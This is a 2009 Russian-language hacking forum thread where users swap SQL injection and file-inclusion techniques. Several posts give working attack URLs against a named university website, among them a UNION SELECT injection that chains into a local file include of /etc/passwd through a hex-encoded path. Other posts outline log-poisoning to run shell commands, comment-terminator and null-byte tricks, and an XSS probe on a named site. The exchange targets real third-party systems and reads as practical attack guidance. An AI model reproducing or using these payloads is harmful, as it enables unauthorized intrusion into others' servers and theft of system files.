Ваши вопросы по уязвимостям.

Обсуждение в разделе «Уязвимости», начал(-а) darky, 4.08.2007.

Статус темы:
Тема закрыта для ответов.
  1. prescott

    prescott Elder - Старейшина

    Регистрация:
    28.07.2008
    Сообщения:
    132
    Одобрения:
    43
    Репутация:
    5
    Подскажите возможные пути к httpd.conf апача, не могу найти и все тут.
     
  2. Qwazar

    Qwazar Elder - Старейшина

    Регистрация:
    2.06.2005
    Сообщения:
    989
    Одобрения:
    904
    Репутация:
    587
    Это одобряют 2 пользоветелей.
  3. YoriK

    YoriK Elder - Старейшина

    Регистрация:
    12.09.2006
    Сообщения:
    33
    Одобрения:
    1
    Репутация:
    0
    Нашёл инъекцию, но после запроса select в скрипте идет запрос update и вылетает ошибка синтаксиса с запросом:

    SELECT * FROM news WHERE type='show' AND id=-32 union select 1,2,3,4,5,6,7,8,9,10 from users
    UPDATE news SET count='33' WHERE id=-32 union select 1,2,3,4,5,6,7,8,9,10 from users

    поле id обрабатывается функцией addslash() и into output не прокатит. Подскажите, как можно посмотреть данные минуя ошибку.
     
  4. VITАL

    VITАL Elder - Старейшина

    Регистрация:
    19.08.2008
    Сообщения:
    1
    Одобрения:
    25
    Репутация:
    10
    YoriK
    SELECT * FROM news WHERE type='show' AND id=32 and 2=1 union select 1,2,3,4,5,6,7,8,9,1100 from users%23
    почему не канает?

    10 колонок, после апдейта вывод в 10
     
    #9384 VITАL, 20.10.2009
    В последний раз редактировалось: 20.10.2009
    Это одобряют 2 пользоветелей.
  5. Byrger

    Byrger Elder - Старейшина

    Регистрация:
    7.03.2008
    Сообщения:
    521
    Одобрения:
    26
    Репутация:
    -4
    Если в уязвимом скрипте идёт инклуд типа
    PHP:
    include("pages/$_GET[act].php");
    То можно провести внешний инклуд?
     
    #9385 Byrger, 20.10.2009
    В последний раз редактировалось: 20.10.2009
  6. Kakoytoxaker

    Kakoytoxaker Elder - Старейшина

    Регистрация:
    18.02.2008
    Сообщения:
    1 038
    Одобрения:
    1 139
    Репутация:
    350
  7. Byrger

    Byrger Elder - Старейшина

    Регистрация:
    7.03.2008
    Сообщения:
    521
    Одобрения:
    26
    Репутация:
    -4
    А что можно полезного тогда получить из него если на машине Линукс?
     
  8. SeNaP

    SeNaP Elder - Старейшина

    Регистрация:
    7.08.2008
    Сообщения:
    378
    Одобрения:
    69
    Репутация:
    20
    https://forum.antichat.ru/thread12123.html
     
  9. .Slip

    .Slip Elder - Старейшина

    Регистрация:
    16.01.2006
    Сообщения:
    1 571
    Одобрения:
    977
    Репутация:
    783
    Всё то же самое что и при удаленном. Просто потребуется немного больше времени и немного больше навыков.
     
    Это одобряет 1 пользователь.
  10. AFoST

    AFoST Elder - Старейшина

    Регистрация:
    28.05.2007
    Сообщения:
    588
    Одобрения:
    485
    Репутация:
    176
    тут нормальная не блайнд инъекция
    http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),2,3,4,5--+-&lan=ukr
     
  11. AFoST

    AFoST Elder - Старейшина

    Регистрация:
    28.05.2007
    Сообщения:
    588
    Одобрения:
    485
    Репутация:
    176
    о ептыть тут еще инклуд есть
    http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764,3,4,5--+-&lan=ukr
     
    Это одобряет 1 пользователь.
  12. Ctacok

    Ctacok Banned

    Регистрация:
    19.12.2008
    Сообщения:
    732
    Одобрения:
    646
    Репутация:
    251
    Мало информации.
    А вообще можно, нулл байт тебе в руки! (%00, %0A, %0D)
     
    Это одобряет 1 пользователь.
  13. AFoST

    AFoST Elder - Старейшина

    Регистрация:
    28.05.2007
    Сообщения:
    588
    Одобрения:
    485
    Репутация:
    176
    в php-файле, который исполняется есть строчки примерно такие:
    PHP:
    mysql_query("select pole1,pole2 from table1 where id_doc=".$_GET[id_doc]);
    далее
    $pole2 = присваивается значение 2 поля.
    после этого идёт локаьный инклуд файла
    PHP:
    main('../'.$pole2);
    Мы запросом
    PHP:
    http://www.univd.edu.ua/document/index.php?id_doc=123+and+1=4+union+select+database(),0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764,3,4,5--+-&lan=ukr
    делаем так, чтобы основной запрос вернул ложь, а UNION SELECT запрос вернул данные которые нам нужны.
    В поле, значение которого потом инклудится, вносим HEX значение строки, так как с ковычками не получилось.
    PHP:
    0x2E2E2F2E2E2F2E2E2F2E2E2F2E2E2F6574632F706173737764
    это равно
    ../../../../../etc/passwd
    соответственно, подставляя во 2 поле в sql-injection путь до искомого файла, он инклудится.
    Что непонятно - спрашивай.
     
    #9393 AFoST, 21.10.2009
    В последний раз редактировалось: 21.10.2009
    Это одобряют 2 пользоветелей.
  14. Ctacok

    Ctacok Banned

    Регистрация:
    19.12.2008
    Сообщения:
    732
    Одобрения:
    646
    Репутация:
    251
    Хотя бы есть выбор:
    --
    {
    %23
    #
     
    Это одобряют 2 пользоветелей.
  15. AFoST

    AFoST Elder - Старейшина

    Регистрация:
    28.05.2007
    Сообщения:
    588
    Одобрения:
    485
    Репутация:
    176
    1. форум античата в длинных строках вставляет пробелы.
    2. А про local file include почитай на форуме есть. Скажу одно - это огромный плюс!
     
    Это одобряет 1 пользователь.
  16. bons

    bons Elder - Старейшина

    Регистрация:
    20.12.2007
    Сообщения:
    286
    Одобрения:
    121
    Репутация:
    21
    скобка не есть комментарий
    файл passwd даст список юзеров системы, а иногда эта информация может помочь.
     
  17. AFoST

    AFoST Elder - Старейшина

    Регистрация:
    28.05.2007
    Сообщения:
    588
    Одобрения:
    485
    Репутация:
    176
    Да, это известный прием инклуда лог файла.
    1. находим инклуд
    2. находим логи /path/log/access_log
    3. запрос с cmd на сайт http://site/? ...
    4. инклудим через инклуд, найденный в п.1. access_log
    http://site/include.php?include=/path/log/acces_log&cmd=ls+-lia

    upd ты права таким способом не поднимаешь, ты просто выполняешь php.

    ps Изъясняй мысли правильней!!! Я с 5го прочтения тебя понимаю!!!
     
    #9397 AFoST, 21.10.2009
    В последний раз редактировалось: 21.10.2009
  18. Totgeliebt

    Totgeliebt New Member

    Регистрация:
    20.10.2009
    Сообщения:
    37
    Одобрения:
    1
    Репутация:
    0
    Вот посмотрите пожалуйста, мне кажется это пассивная XSS?просто я в этом вообще не разбераюсь =))
    http://la2.sz.ru/news.php?%22%3E%3Cscript%3Ealert()%3C/script%3Ereadmore=99
     
  19. gisTy

    gisTy Elder - Старейшина

    Регистрация:
    24.05.2008
    Сообщения:
    432
    Одобрения:
    160
    Репутация:
    27
    нет
     
    Это одобряет 1 пользователь.
  20. DeluxeS

    DeluxeS Member

    Регистрация:
    1.08.2009
    Сообщения:
    7
    Одобрения:
    81
    Репутация:
    19
    Подкиньте статей по LFI. А то ничего найти не могу =(
     
Статус темы:
Тема закрыта для ответов.